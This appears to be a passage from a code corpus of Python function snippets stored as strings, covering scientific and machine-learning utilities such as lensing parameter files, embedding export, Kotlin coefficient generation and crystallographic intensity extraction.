"def compute_kappa_map(lens_vec, size, size_map):\n\n par_file_name = \"kappa_map.par\"\n fit_file_name = \"kappa_map.fits\"\n z_source = 2.0\n size_map = size_map * 1.05\n\n file_map = open(par_file_name, 'w')\n\n conv_lens_vec(lens_vec)\n\n file_map.write(\"runmode\\n\" )\n file_map.write(\" reference 3 0 0\\n\")\n file_map.write(\" verbose 0\\n\" )\n file_map.write(\" mass 3 \" + str(size) + \" \" + \\\n str(lens_vec[0][\"z_lens\"]) + \" \" + fit_file_name + \"\\n\")\n file_map.write(\" end\\n\")\n file_map.write(\"source\\n\")\n file_map.write(\" z_source \" + str(z_source) + \"\\n\")\n file_map.write(\" end\\n\")\n file_map.write(\"grille\\n\")\n file_map.write(\" nombre 128\\n\")\n file_map.write(\" nlens 4\\n\")\n file_map.write(\" nlens_crit 1\\n\")\n file_map.write(\" nlens_opt 0\\n\")\n file_map.write(\" polaire 1\\n\")\n file_map.write(\" end\\n\")\n\n\n for i in range(len(lens_vec)):\n string_out = 'potential ' + str(i) + '\\n'\n file_map.write(string_out)\n #print string_out,\n for keys in lens_vec[i].keys():\n string_out = ' ' + keys + ' ' + str(lens_vec[i][keys]) + \\\n '\\n'\n #print string_out,\n file_map.write(string_out)\n file_map.write(' end\\n')\n\n file_map.write(\"cosmology\\n\")\n file_map.write(\" H0 70.0\\n\")\n file_map.write(\" omega 0.3\\n\")\n file_map.write(\" lambda 0.7\\n\")\n file_map.write(\" end\\n\")\n file_map.write(\"champ\\n\")\n file_map.write(\" xmin -101\\n\")\n file_map.write(\" xmax 100\\n\")\n file_map.write(\" ymin -101\\n\")\n file_map.write(\" ymax 100\\n\")\n file_map.write(\" dmax \" + str(size_map) + \"\\n\")\n file_map.write(\" end\\n\")\n file_map.write(\"fini\\n\")\n\n file_map.close()",
"def make_sol_dict():\n file_names = [\"FORMAT3_Copy of KommuneMTPLforTriangle.xls\",\n \"C Triangulations analysis R2017 GC20161109.xls\",\n \"EVOLUTION 2017 _ M+F - Triangles cat nat brut net.xls\",\n \"Bsp8 _ Dreiecke aus GCNA für CU1.4.1.xls\",\n \"Analysis MTPL MOD.xls\",\n \"Bsp6 _ Dreiecke aus GCNA für CU1.4.1.xls\",\n \"FORMAT6_sinistres.xls\",\n \"FORMAT1_LOSSES-MTPL-OVER-500-GROUP-2005_modified.xls\"]\n solutions_dict = dict()\n raw_dict = dict()\n for file_name in file_names:\n sr_list, file_name = ExcelLoader.load_excel(pdir.RESOURCES_DIR + \"/raw_test_files/\" + file_name)\n dh = DataHolder()\n for sr in sr_list:\n dh.add_sheet(sr.sheet_name, pd.DataFrame(columns=sr.headers, data=sr.row_vals),\n pd.DataFrame(columns=sr.headers, data=sr.xls_types), orig_sheet_name=sr.sheet_name)\n\n dh = SheetPreProcessor.separate_components(dh)\n raw_dict[file_name] = dh.encode()\n dh = HorizontalMerger.horizontal_merge(dh)\n #temp_path = pdir.RESOURCES_DIR + \"/temp/\"\n #dh.write_excel(temp_path + file_name)\n solutions_dict[file_name] = dh\n solutions_dict = MergePararametersOptimizer.make_ind_col_dict(solutions_dict)\n with open(pdir.RESOURCES_DIR + \"/test/merge_solutions.obj\", \"wb\") as temp_file:\n pickle.dump(solutions_dict, temp_file)\n with open(pdir.RESOURCES_DIR + \"/test/raw_test.obj\", \"wb\") as temp_file:\n pickle.dump(raw_dict, temp_file)",
"def run(self, inputIn):\n measureList = self.inputToInternal(inputIn)\n outputDict = {}\n assert(len(self.features) == len(measureList))\n for metricInstance in self.metricsDict.values():\n metricEngine = MetricDistributor.factory.returnInstance('MetricDistributor', metricInstance)\n for cnt in range(len(self.targets)):\n nodeName = (str(self.targets[cnt]) + '_' + str(self.features[cnt])).replace(\"|\",\"_\")\n varName = metricInstance.name + '|' + nodeName\n output = metricEngine.evaluate(measureList[cnt], weights=self.weight, multiOutput=self.multiOutput)\n outputDict[varName] = np.atleast_1d(output)\n return outputDict",
"def generate_query_vector(q, q_dict, inv_index):\n # Create the query vector\n query_vector = dict(Counter(q_dict[q]))\n\n # Add to this query vector, all the indexed terms\n for i_term in inv_index:\n if i_term not in query_vector:\n query_vector[i_term] = 0\n\n return query_vector",
"def to_dict(self):\n result_dict = {}\n result_dict['evaluations'] = self.evaluations\n result_dict['dof'] = self.dof\n result_dict['variances'] = self.variances\n result_dict['noise_ceiling'] = self.noise_ceiling\n result_dict['method'] = self.method\n result_dict['cv_method'] = self.cv_method\n result_dict['models'] = {}\n for i_model in range(len(self.models)):\n key = 'model_%d' % i_model\n result_dict['models'][key] = self.models[i_model].to_dict()\n return result_dict",
"def gen_values(self):",
"def export_embeddings(self):\n save_path = self.config.path_embeddings / self.model.model_name\n save_path.mkdir(parents=True, exist_ok=True)\n \n idx2ent = self.model.config.knowledge_graph.read_cache_data('idx2entity')\n idx2rel = self.model.config.knowledge_graph.read_cache_data('idx2relation')\n\n\n series_ent = pd.Series(idx2ent)\n series_rel = pd.Series(idx2rel)\n series_ent.to_pickle(save_path / \"ent_labels.pickle\")\n series_rel.to_pickle(save_path / \"rel_labels.pickle\")\n\n with open(str(save_path / \"ent_labels.tsv\"), 'w') as l_export_file:\n for label in idx2ent.values():\n l_export_file.write(label + \"\\n\")\n\n with open(str(save_path / \"rel_labels.tsv\"), 'w') as l_export_file:\n for label in idx2rel.values():\n l_export_file.write(label + \"\\n\")\n\n for parameter in self.model.parameter_list:\n all_ids = list(range(0, int(parameter.shape[0])))\n stored_name = parameter.name.split(':')[0]\n # import pdb; pdb.set_trace()\n\n if len(parameter.shape) == 2:\n all_embs = parameter.numpy()\n with open(str(save_path / (\"%s.tsv\" % stored_name)), 'w') as v_export_file:\n for idx in all_ids:\n v_export_file.write(\"\\t\".join([str(x) for x in all_embs[idx]]) + \"\\n\")\n\n df = pd.DataFrame(all_embs)\n df.to_pickle(save_path / (\"%s.pickle\" % stored_name))",
"def write_kotlin_source(self):\n prefix = \"import \"\n imports = [prefix + \"koma.matrix.Matrix\", prefix + \"koma.extensions.set\"]\n\n with open(self.class_name + \"Coeffs.kt\", \"w\") as source_file:\n for val in sorted(imports):\n print(val, file=source_file)\n\n source_file.write(os.linesep)\n ty = \"Matrix<Double>\"\n\n # data classes needed because java state space isn't in wpilib (yet)\n self.__write_kotlin_data_class(source_file, \"StateSpacePlantCoeffs\", {\"A\": ty, \"B\": ty, \"C\": ty, \"D\": ty})\n self.__write_kotlin_data_class(source_file, \"StateSpaceControllerCoeffs\",\n {\"K\": ty, \"Kff\": ty, \"Umin\": ty, \"Umax\": ty})\n if self.period_variant:\n self.__write_kotlin_data_class(source_file, \"StateSpaceObserverCoeffs\", {\"Qcontinuous\": ty, \"Rcontinuous\": ty, \"PsteadyState\": ty})\n else:\n self.__write_kotlin_data_class(source_file, \"StateSpaceObserverCoeffs\", {\"K\": ty})\n source_file.write(os.linesep)\n\n # write makePlantCoeffs()\n self.__write_kotlin_func_name(source_file, \"StateSpacePlantCoeffs\", \"PlantCoeffs\")\n if self.period_variant:\n self.__write_kotlin_matrix(source_file, self.system.sysc.A, \"Acontinuous\")\n self.__write_kotlin_matrix(source_file, self.system.sysc.B, \"Bcontinuous\")\n self.__write_kotlin_matrix(source_file, self.system.sysd.C, \"C\")\n self.__write_kotlin_matrix(source_file, self.system.sysd.D, \"D\")\n print(\n \" return StateSpacePlantCoeffs(Acontinuous, Bcontinuous, C, D)\",\n file=source_file)\n else:\n self.__write_kotlin_matrix(source_file, self.system.sysd.A, \"A\")\n self.__write_kotlin_matrix(source_file, self.system.sysd.B, \"B\")\n self.__write_kotlin_matrix(source_file, self.system.sysd.C, \"C\")\n self.__write_kotlin_matrix(source_file, self.system.sysd.D, \"D\")\n print(\n \" return StateSpacePlantCoeffs(A, B, C, D)\",\n file=source_file\n )\n print(\"}\" + os.linesep, file=source_file)\n\n # Write makeControllerCoeffs()\n self.__write_kotlin_func_name(source_file, \"StateSpaceControllerCoeffs\", \"ControllerCoeffs\")\n self.__write_kotlin_matrix(source_file, self.system.K, \"K\")\n self.__write_kotlin_matrix(source_file, self.system.Kff, \"Kff\")\n self.__write_kotlin_matrix(source_file, self.system.u_min, \"Umin\")\n self.__write_kotlin_matrix(source_file, self.system.u_max, \"Umax\")\n print(\n \" return StateSpaceControllerCoeffs(K, Kff, Umin, Umax)\",\n file=source_file\n )\n print(\"}\" + os.linesep, file=source_file)\n\n # Write makeObserverCoeffs()\n self.__write_kotlin_func_name(source_file, \"StateSpaceObserverCoeffs\", \"ObserverCoeffs\")\n if self.period_variant:\n self.__write_kotlin_matrix(source_file, self.system.Q, \"Qcontinuous\")\n self.__write_kotlin_matrix(source_file, self.system.R, \"Rcontinuous\")\n self.__write_kotlin_matrix(source_file, self.system.P_steady, \"PsteadyState\")\n\n first_line_prefix = \" return StateSpaceObserverCoeffs(\"\n space_prefix = \" \" * len(first_line_prefix)\n print(first_line_prefix + \"Qcontinuous, Rcontinuous,\", file=source_file)\n print(space_prefix + \"PsteadyState)\", file=source_file)\n else:\n self.__write_kotlin_matrix(source_file, self.system.kalman_gain, \"K\")\n print(\" return StateSpaceObserverCoeffs(K)\", file=source_file)\n print(\"}\" + os.linesep, file=source_file)",
"def save_expval_final_statevecs():\n # Get pre-measurement statevectors\n statevecs = []\n # State |+1>\n statevec = Statevector.from_label(\"+1\")\n statevecs.append(statevec)\n # State |00> + |11>\n statevec = (Statevector.from_label(\"00\") + Statevector.from_label(\"11\")) / np.sqrt(2)\n statevecs.append(statevec)\n # State |10> -i|01>\n statevec = (Statevector.from_label(\"10\") - 1j * Statevector.from_label(\"01\")) / np.sqrt(2)\n statevecs.append(statevec)\n return statevecs",
"def word2vec_mapping_func():\n return {\"belonging to\": \"belonging\", \"parked on\": \"parked\", \"growing on\": \"growing\", \"standing on\": \"standing\",\n \"made of\": \"made\", \"attached to\": \"attached\", \"hanging from\": \"hanging\", \"in front of\": \"front\",\n \"lying on\": \"lying\", \"flying in\": \"flying\", \"looking at\": \"looking\", \"on back of\": \"back\",\n \"laying on\": \"laying\", \"walking on\": \"walking\", \"walking in\": \"walking\", \"sitting on\": \"sitting\",\n \"covered in\": \"covered\", \"part of\": \"part\", \"painted on\": \"painted\", \"mounted on\": \"mounted\"}",
"def create_vectors(self):\n self.localStatistics = []\n self.lastStatistics = []\n self.globalV = []\n self.estimate = []\n self.delta = []\n self.drift = []\n self.slack = [] # only for coordBased model",
"def vectorize(data, word_dict):\n\n # Index words\n inputs_list = data['input']\n targets_list = data['target']\n\n inputs = []\n for k in range(len(inputs_list)):\n year,month,day = inputs_list[k][0].split('/')\n year, month, day = int(year),int(month),int(day)\n if k == 0:\n week_index = datetime.timedelta(days=0)\n time0 = datetime.date(year,month,day)\n else:\n time1 = datetime.date(year,month,day)\n week_index = time1-time0\n tp_list = [word_dict[w] for w in inputs_list[k][1]]\n inputs.append([week_index.days,tp_list])\n\n year, month, day = targets_list[0].split('/')\n year, month, day = int(year), int(month), int(day)\n time1 = datetime.date(year, month, day)\n week_index = time1 - time0\n targets = [week_index.days,word_dict[targets_list[1]]]\n return {'input':inputs,'target':targets,'<PAD>':word_dict['<PAD>']}",
"def create_vector_datapackage(pk_type, path, file_flag, out_path):\n process_source(pk_type, path, file_flag, out_path)",
"def save_results(self, *args):\n try:\n filename = args[0]\n except IndexError:\n filename = self.filename\n results = {}\n results['gp_pred'] = self.gp_predictions\n results['func_val'] = self.target_func_vals\n results['inds_all'] = np.array(self.indices_all)\n results['vals_all'] = np.array(self.vals_all)\n np.save(filename+\".npy\", results)",
"def __post_init__(self):\n all_vecs = {}\n for n2 in self._get_n2():\n all_vecs[n2] = all_vecs.get(n2, 0) + 1\n\n object.__setattr__(self, \"_n2\", np.array(list(all_vecs.keys())).reshape(-1, 1))\n object.__setattr__(\n self, \"_multiplicity\", np.array(list(all_vecs.values())).reshape(-1, 1)\n )\n object.__setattr__(\n self,\n \"_normalization\",\n 2 * np.pi * np.log(self.N)\n if self.spherical\n else 2 * np.pi * np.log(self.N) - 4 * (CATALAN - np.pi / 2 * np.log(2)),\n )",
"def add_vector_fields(attributes, data):\n for attrib in attributes:\n if attrib['similarity'] == 'Semantic USE':\n value = data.get(attrib['name'])\n if value is not None:\n newVal = {}\n newVal['name'] = value\n newVal['rep'] = getVector(value)\n data[attrib['name']] = newVal\n elif attrib['similarity'] == 'Semantic SBERT':\n value = data.get(attrib['name'])\n if value is not None:\n newVal = {}\n newVal['name'] = value\n newVal['rep'] = getVectorSemanticSBERT(value)\n data[attrib['name']] = newVal\n elif attrib['similarity'] == 'Array SBERT':\n value = data.get(attrib['name'])\n if value is not None:\n newVal = {}\n newVal['name'] = value\n newVal[\"rep\"] = []\n array = getVectorSemanticSBERTArray(value)\n for element in array:\n temp = {}\n temp['rep'] = element\n newVal[\"rep\"].append(temp)\n\n data[attrib['name']] = newVal\n return data",
"def classify(self, vector):\n return {}",
"def vector_columns(map, layer=None, getDict=True, **args):\n s = read_command('v.info', flags='c', map=map, layer=layer, quiet=True,\n **args)\n if getDict:\n result = dict()\n else:\n result = list()\n i = 0\n for line in s.splitlines():\n ctype, cname = line.split('|')\n if getDict:\n result[cname] = {'type': ctype, 'index': i}\n else:\n result.append(cname)\n i += 1\n\n return result",
"def vectorize(self,clean_path):\n \n #load pretrained embedding model (GloVe)\n glove = spacy.load('en_core_web_lg')\n #extract unique words (aka vocabulary)\n unique_words = set()\n for d in self.docs: \n txt = d.text\n doc = glove(txt)\n for word in doc: \n if word.has_vector:\n unique_words.add(word.text)\n #change set to list type\n unique_words = list(unique_words)\n #save vector representation\n word_vectors = np.array([glove(word).vector for word in unique_words if glove(word).has_vector])\n #index vectors by corresponding word \n corpus_vectors = pd.DataFrame(word_vectors, index=unique_words)\n with open(clean_path + 'corpus_vectors.pkl', 'wb') as f:\n pickle.dump(corpus_vectors,f)\n self.vectors = corpus_vectors\n print('Saved embedding vectors.')\n return",
"def generate_rel_non_rel_vector(inv_index, doc_scores, start, end):\n\n result_vector = {}\n\n for i in range(start, end):\n doc_id, doc_score = doc_scores[i]\n\n # Get the content of this document which will be in the form of a string\n # convert it into a list of words and create a frequency map of the\n # words\n\n # NOTE: corpus_collection_path is the global variable here\n\n fp = open(str(corpus_collection_path) + \"\\\\\" + doc_id + \".html\")\n content = fp.read().split()\n fp.close()\n\n result_vector = dict(Counter(content))\n\n # Check with the inverted index\n for index_item in inv_index:\n if index_item not in result_vector:\n result_vector[index_item] = 0\n\n return result_vector",
"def write_vector(vector, outfile):\r\n out_dir = os.path.dirname(outfile)\r\n if not os.path.exists(out_dir):\r\n os.makedirs(out_dir)\r\n\r\n vector = vector.copy()\r\n for k in vector:\r\n if isinstance(vector[k], np.ndarray):\r\n vector[k] = vector[k].round(4).tolist()\r\n with open(outfile, 'w') as f:\r\n json.dump(vector, f)\r\n f.write('\\n')\r\n\r\n print(\" ... wrote {}\".format(outfile))",
"def dictionary_saver(d, filename):\n json_friendly_d = {json.dumps(k):v for k,v in d.items()}\n sklearn.externals.joblib.dump(json_friendly_d, filename)",
"def getCrowDistDict(self):\n retDict = Distribution.getCrowDistDict(self)\n retDict['k'] = self.alpha\n retDict['theta'] = 1.0/self.beta\n retDict['low'] = self.low\n return retDict",
"def __call__(self, *args, **kwargs):\n self.features = dict((k, v()) for k, v in self.features.items())\n return self.features",
"def write_vector(vector, outfile):\n out_dir = os.path.dirname(outfile)\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n vector = vector.copy()\n for k in vector:\n if isinstance(vector[k], np.ndarray):\n vector[k] = vector[k].round(4).tolist()\n with open(outfile, 'w') as f:\n json.dump(vector, f, separators=(',', ': '), indent=4)\n f.write('\\n')\n\n print(\" ... wrote {}\".format(outfile))",
"def create_datastructures_for_target_mtz(experiments, mtz_file):\n m = mtz.object(mtz_file)\n ind = m.extract_miller_indices()\n cols = m.columns()\n col_dict = {c.label(): c for c in cols}\n r_t = flex.reflection_table()\n if \"I\" in col_dict: # nice and simple\n r_t[\"miller_index\"] = ind\n r_t[\"intensity\"] = col_dict[\"I\"].extract_values().as_double()\n r_t[\"variance\"] = flex.pow2(col_dict[\"SIGI\"].extract_values().as_double())\n elif \"IMEAN\" in col_dict: # nice and simple\n r_t[\"miller_index\"] = ind\n r_t[\"intensity\"] = col_dict[\"IMEAN\"].extract_values().as_double()\n r_t[\"variance\"] = flex.pow2(col_dict[\"SIGIMEAN\"].extract_values().as_double())\n elif \"I(+)\" in col_dict: # need to combine I+ and I- together into target Ih\n if col_dict[\"I(+)\"].n_valid_values() == 0: # use I(-)\n r_t[\"miller_index\"] = ind\n r_t[\"intensity\"] = col_dict[\"I(-)\"].extract_values().as_double()\n r_t[\"variance\"] = flex.pow2(\n col_dict[\"SIGI(-)\"].extract_values().as_double()\n )\n elif col_dict[\"I(-)\"].n_valid_values() == 0: # use I(+)\n r_t[\"miller_index\"] = ind\n r_t[\"intensity\"] = col_dict[\"I(+)\"].extract_values().as_double()\n r_t[\"variance\"] = flex.pow2(\n col_dict[\"SIGI(+)\"].extract_values().as_double()\n )\n else: # Combine both - add together then use Ih table to calculate I and sigma\n r_tplus = flex.reflection_table()\n r_tminus = flex.reflection_table()\n r_tplus[\"miller_index\"] = ind\n r_tplus[\"intensity\"] = col_dict[\"I(+)\"].extract_values().as_double()\n r_tplus[\"variance\"] = flex.pow2(\n col_dict[\"SIGI(+)\"].extract_values().as_double()\n )\n r_tminus[\"miller_index\"] = ind\n r_tminus[\"intensity\"] = col_dict[\"I(-)\"].extract_values().as_double()\n r_tminus[\"variance\"] = flex.pow2(\n col_dict[\"SIGI(-)\"].extract_values().as_double()\n )\n r_tplus.extend(r_tminus)\n r_tplus.set_flags(\n flex.bool(r_tplus.size(), False), r_tplus.flags.bad_for_scaling\n )\n r_tplus = r_tplus.select(r_tplus[\"variance\"] != 0.0)\n Ih_table = create_Ih_table(\n [experiments[0]], [r_tplus], anomalous=True\n ).blocked_data_list[0]\n r_t[\"intensity\"] = Ih_table.Ih_values\n inv_var = Ih_table.sum_in_groups(Ih_table.weights, output=\"per_refl\")\n r_t[\"variance\"] = 1.0 / inv_var\n r_t[\"miller_index\"] = Ih_table.miller_index\n else:\n raise KeyError(\"Unable to find intensities (tried I, IMEAN, I(+)/I(-))\")\n logger.info(f\"Extracted {r_t.size()} intensities from target mtz\")\n r_t = r_t.select(r_t[\"variance\"] > 0.0)\n if r_t.size() == 0:\n raise ValueError(\"No reflections with positive sigma remain after filtering\")\n r_t[\"d\"] = (\n miller.set(\n crystal_symmetry=crystal.symmetry(\n space_group=m.space_group(), unit_cell=m.crystals()[0].unit_cell()\n ),\n indices=r_t[\"miller_index\"],\n )\n .d_spacings()\n .data()\n )\n r_t.set_flags(flex.bool(r_t.size(), True), r_t.flags.integrated)\n\n exp = Experiment()\n exp.crystal = deepcopy(experiments[0].crystal)\n exp.identifier = ersatz_uuid4()\n r_t.experiment_identifiers()[len(experiments)] = exp.identifier\n r_t[\"id\"] = flex.int(r_t.size(), len(experiments))\n\n # create a new KB scaling model for the target and set as scaled to fix scale\n # for targeted scaling.\n params = Mock()\n params.KB.decay_correction.return_value = False\n exp.scaling_model = KBScalingModel.from_data(params, [], [])\n exp.scaling_model.set_scaling_model_as_scaled() # Set as scaled to fix scale.\n return exp, r_t",
"def getDataDict(self):\n # Used to compare data in MATLAB\n d = {'Vm': self.r_Vm,\n 'Va': self.r_Va,\n 'BusName': self.Busnam,\n 'BusNum': self.Extnum,\n }\n return d",
"def getSolutionExportVariableNames(cls):\n return {}",
"def transformDistDict(self):\n # Generate a standard normal distribution, this is used to generate the sparse grid points and weights for multivariate normal\n # distribution if PCA is used.\n standardNormal = Distributions.Normal()\n standardNormal.mean = 0.0\n standardNormal.sigma = 1.0\n standardNormal.initializeDistribution()\n distDicts = {}\n for varName in self.variables2distributionsMapping:\n distDicts[varName] = self.distDict[varName]\n if self.variablesTransformationDict:\n for key, varsDict in self.variablesTransformationDict.items():\n if self.transformationMethod[key] == 'pca':\n listVars = varsDict['latentVariables']\n for var in listVars:\n distDicts[var] = standardNormal\n\n return distDicts",
"def exportData(self):\n\t\tlays = rlayer.renderlayers()\n\t\tdata = {}\n\t\tfor l in lays:\n\t\t\tif l.name == 'defaultRenderLayer':\n\t\t\t\tcontinue\n\t\t\tdata[l.name] = {'objects':l.objects, # OBJECTS IN LAYER\n\t\t\t\t\t\t\t'values' :l.overridesWithValues, # OVERRIDED ATTRIBUTES ONLY CHANGED VALUES\n\t\t\t\t\t\t\t'conns' :l.overridesWithConnections[0], # OVERRIDED ATTRIBUTES CHANGED CONNECTIONS\n\t\t\t\t\t\t\t'shader' :l.overridedShader # OVERRIDE RENDERLAYER SHADER\n\t\t\t\t\t\t\t}\n\t\tpickle.dump( data, open( self.dataPath.path, \"wb\" ) )",
"def _results(self):\n results = {}\n results[\"coeff\"] = self._coeff_to_dict()\n results[\"coeff_path\"] = dict(\n zip(\n [f\"{col}\" for col in self.X_train_.columns.tolist()],\n (\n self.model_.coef_path_.reshape(-1, self.model_.coef_path_.shape[-1])\n ).tolist(),\n )\n )\n results[\"cv_standard_error\"] = self.model_.cv_standard_error_.tolist()\n results[\"cv_mean_score\"] = self.model_.cv_mean_score_.tolist()\n results[\"lambda_path\"] = self.model_.lambda_path_.tolist()\n results[\"lambda_best\"] = self.model_.lambda_best_[0]\n results[\"lambda_max\"] = self.model_.lambda_max_\n results[\"n_lambda\"] = self.model_.n_lambda_\n results[\"intercept\"] = self.model_.intercept_\n results[\"intercept_path\"] = self.model_.intercept_path_.tolist()[0]\n results[\"params\"] = self.model_.get_params()\n results[\"module\"] = self.model_.__module__\n\n return results",
"def dump_w2vdictionary(outfilename,wordlist,matrix):\n ostream = open(outfilename,'w')\n print('%d %d'%(len(wordlist),matrix.shape[1]),file=ostream)\n for word,vec in zip(wordlist,matrix):\n print(' '.join([word]+ [ str(elt) for elt in vec]),file=ostream)\n ostream.close()",
"def getCrowDistDict(self):\n retDict = Distribution.getCrowDistDict(self)\n retDict['alpha'] = self.alpha\n retDict['beta'] = self.beta\n retDict['scale'] = self.high-self.low\n retDict['low'] = self.low\n return retDict",
"def __init__(self):\n self.map = {}\n self.vec = []",
"def vec_to_dict(docVec):\n return {dimension:value for dimension, value in enumerate(docVec)}",
"def save_data(self, name, from_attrs=[], **data):\n data[\"data_version\"] = self.data_version\n\n file_opts = {}\n for opt in [\"map_tag\", \"iter_index\", \"bp_opts\", \"extra_tag\"]:\n if opt in data:\n file_opts[opt] = data.pop(opt)\n\n output_file = self.get_filename(name, ext=\".npz\", **file_opts)\n if not output_file:\n return\n\n for attr in from_attrs:\n if hasattr(self, attr):\n data[attr] = getattr(self, attr)\n\n np.savez_compressed(output_file, **data)\n self.log(\"Saved output data to {}\".format(output_file), \"debug\")\n data[\"output_file\"] = output_file\n return data",
"def FTLM_static_iteration(O_dict,E,V,Q_T,beta=0):\n\tnv = E.size\n\n\n\tp = _np.exp(-_np.outer(_np.atleast_1d(beta),E))\n\tc = _np.einsum(\"j,aj,...j->a...\",V[0,:],V,p)\n\n\tr,Q_T = _get_first_lv(iter(Q_T))\n\n\tresults_dict = {}\n\n\tAr_dict = {key:A.dot(r) for key,A in iteritems(O_dict)}\n\n\tfor i,lv in enumerate(Q_T): # nv matvecs\n\t\tfor key,A in iteritems(O_dict):\n\t\t\tif key in results_dict:\n\t\t\t\tresults_dict[key] += _np.squeeze(c[i,...] * _np.vdot(lv,Ar_dict[key]))\n\t\t\telse:\n\t\t\t\tresults_dict[key] = _np.squeeze(c[i,...] * _np.vdot(lv,Ar_dict[key]))\n\n\treturn results_dict,_np.squeeze(c[0,...])",
"def operator_dict(self, index, vars, **kw):\n out = defaultdict(int)\n # Freeze arg1 metadata for caching ncc matrices\n frozen_arg1_basis_meta = freeze_meta(self.args[1].meta)[-1]\n op0 = self.args[0].as_ncc_operator(frozen_arg1_basis_meta, **kw)\n op1 = self.args[1].operator_dict(index, vars, **kw)\n for var in op1:\n out[var] = op0 * op1[var]\n return out",
"def evaluate():\n global dictionary, wv\n count = 0\n # To save the scores by distance and similarity\n scores = np.zeros(6)\n similar = np.zeros(6)\n itr = len(dictionary)\n logging.info('running evaluation for {0} samples'.format(itr))\n for key in dictionary:\n progress = (count / itr) * 100\n d = dictionary[key].split('resource/')\n d = [idx.split()[0].translate(table).lower() for idx in d[1:]]\n try:\n r = np.array(list(map(lambda x: wv.get_vector(x), d)),\n dtype=np.float32)\n except KeyError:\n itr -= 1\n continue\n if np.any(np.isnan(r)):\n itr -= 1\n continue\n else:\n if r.ndim == 2:\n try:\n # Mean of vector containing all word vectors\n # obtained from abstract.\n r = r.mean(axis=0).reshape(1, -1)\n \n # Obtain the vectors for the entity\n mean_vec = mean_encoder(dictionary[key])\n mean_vec = mean_vec.reshape(1, -1) / norm(mean_vec)\n mean_dist_vec = distance_encoder(dictionary[key])\n mean_dist_vec = mean_dist_vec.reshape(1, -1)\n mean_dist_vec = mean_dist_vec / norm(mean_dist_vec)\n title_vec = title_mean(key)\n title_vec = title_vec.reshape(1, -1) / norm(title_vec)\n abstract_vec = abstract_encoder(key)\n abstract_vec = abstract_vec.reshape(1, -1)\n abstract_vec = abstract_vec / norm(abstract_vec)\n random_vec = np.random.randn(100).reshape(1, -1)\n zero_vec = np.zeros(100).reshape(1, -1)\n \n # Score the entity vectors\n scores[0] += norm(r - mean_vec)\n scores[1] += norm(r - mean_dist_vec)\n scores[2] += norm(r - title_vec)\n scores[3] += norm(r - abstract_vec)\n scores[4] += norm(r - random_vec)\n scores[5] += norm(r - zero_vec)\n similar[0] += cosine_similarity(r, mean_vec)\n similar[1] += cosine_similarity(r, mean_dist_vec)\n similar[2] += cosine_similarity(r, title_vec)\n similar[3] += cosine_similarity(r, abstract_vec)\n similar[4] += cosine_similarity(r, random_vec)\n similar[5] += cosine_similarity(r, zero_vec)\n count += 1\n print(count, end='\\r')\n except (ValueError, KeyError) as _:\n itr -= 1\n continue\n else:\n itr -= 1\n continue\n # Normalize the scores to get a better\n # comparison against the baselines.\n scores = scores / norm(scores)\n similar = similar / norm(similar)\n print_summary(scores, similar)",
"def sparameters(**kwargs):\n d = sweep(**kwargs)\n d.pop(\"GC_sweeps.lsf\", \"\")\n d[\"main.lsf\"] = \"\\n\".join([\"GC_init;\", \"GC_S_extraction;\"])\n d[\"GC_S_extraction.lsf\"] = open(\n CONFIG[\"grating_coupler\"] / \"GC_S_extraction.lsf\"\n ).read()\n d[\"GC_setup_fibre.lsf\"] = open(\n CONFIG[\"grating_coupler\"] / \"GC_setup_fibre.lsf\"\n ).read()\n d[\n \"main.py\"\n ] = \"\"\"\n\nimport pathlib\nimport json\nimport lumapi\n\n\ndirpath = pathlib.Path(__file__).parent.absolute()\n\ns = lumapi.FDTD()\ns.cd(str(dirpath))\ns.eval(\"main;\")\n\nd = {k: list(abs(s.getv(k).flatten())) for k in [\"S11\", \"S12\", \"S21\", \"S22\", \"f\"]}\n\nwith open(dirpath / \"GC_sparameters.json\", \"w\") as f:\n f.write(json.dumps(d))\n\n \"\"\"\n return d",
"def getCrowDistDict(self):\n retDict = Distribution.getCrowDistDict(self)\n retDict['lambda'] = self.lambdaVar\n retDict['low'] = self.low\n return retDict",
"def save_vectorizer(self, vectorizer_filepath):\n with open(vectorizer_filepath, \"w\") as fp:\n json.dump(self._vectorizer.to_serializable(), fp)",
"def makeDictionary(self):\n self.dictionary = {}\n for i in range(len(self.movie)):\n if self.movie[i] in self.dictionary:\n vectors = self.dictionary[self.movie[i]]\n vectors[self.user[i]] = self.rating[i]\n self.dictionary[self.movie[i]] = vectors\n else:\n newMovie = dict([(self.user[i], self.rating[i])])\n self.dictionary[self.movie[i]] = newMovie\n return self.dictionary",
"def output_data_definitions(self):\n return {}",
"def createDictionary(dataset):\r\n for columnNumber in range(2, dataset.shape[1]):\r\n print(\"manipulating \", dataset.at[0, columnNumber])\r\n manipulateData(columnNumber, dataset)\r\n return Dictionary",
"def build_Wordv(word2vec_dict, k):\r\n vocab_size = len(word2vec_dict)\r\n word2id_dict = dict()\r\n W = np.zeros(shape=(vocab_size + 1, k))\r\n W[0] = np.zeros(k)\r\n i = 1\r\n for word in word2vec_dict:\r\n # print type(word), ' | ', word\r\n W[i] = word2vec_dict[word]\r\n # print type(W[i]), \" | \", W[i]\r\n word2id_dict[word] = i\r\n i += 1\r\n return W, word2id_dict",
"def create_vectors(list_dict, num_words):\n x = [] # list that will hold data \n\n for d in list_dict:\n # initializing numpy vector\n # it contains 5,000 (number of words) zeros\n temp = np.zeros(num_words, dtype=np.float64)\n for key, val in d.items():\n if key < num_words:\n key -= 1 # indexing in data starts at 1\n temp[key] = 1 # adding word and its frequency to vector \n # temp[key] = val\n x.append(temp) # appends vector to x \n\n return x",
"def codegen_reload_data():\n return {\n \"package\": u\"fn_utilities\",\n \"message_destinations\": [u\"fn_utilities\"],\n \"functions\": [u\"utilities_artifact_hash\", u\"utilities_attachment_hash\", u\"utilities_attachment_to_base64\", u\"utilities_attachment_zip_extract\", u\"utilities_attachment_zip_list\", u\"utilities_base64_to_artifact\", u\"utilities_base64_to_attachment\", u\"utilities_call_rest_api\", u\"utilities_domain_distance\", u\"utilities_email_parse\", u\"utilities_excel_query\", u\"utilities_expand_url\", u\"utilities_extract_ssl_cert_from_url\", u\"utilities_get_contact_info\", u\"utilities_json2html\", u\"utilities_parse_ssl_certificate\", u\"utilities_pdfid\", u\"utilities_resilient_search\", u\"utilities_shell_command\", u\"utilities_string_to_attachment\", u\"utilities_timer\", u\"utilities_xml_transformation\"],\n \"workflows\": [u\"example_artifact_attachment_to_base64\", u\"example_artifact_hash\", u\"example_attachment_hash\", u\"example_attachment_to_base64\", u\"example_call_rest_api\", u\"example_create_artifacts_from_excel_data\", 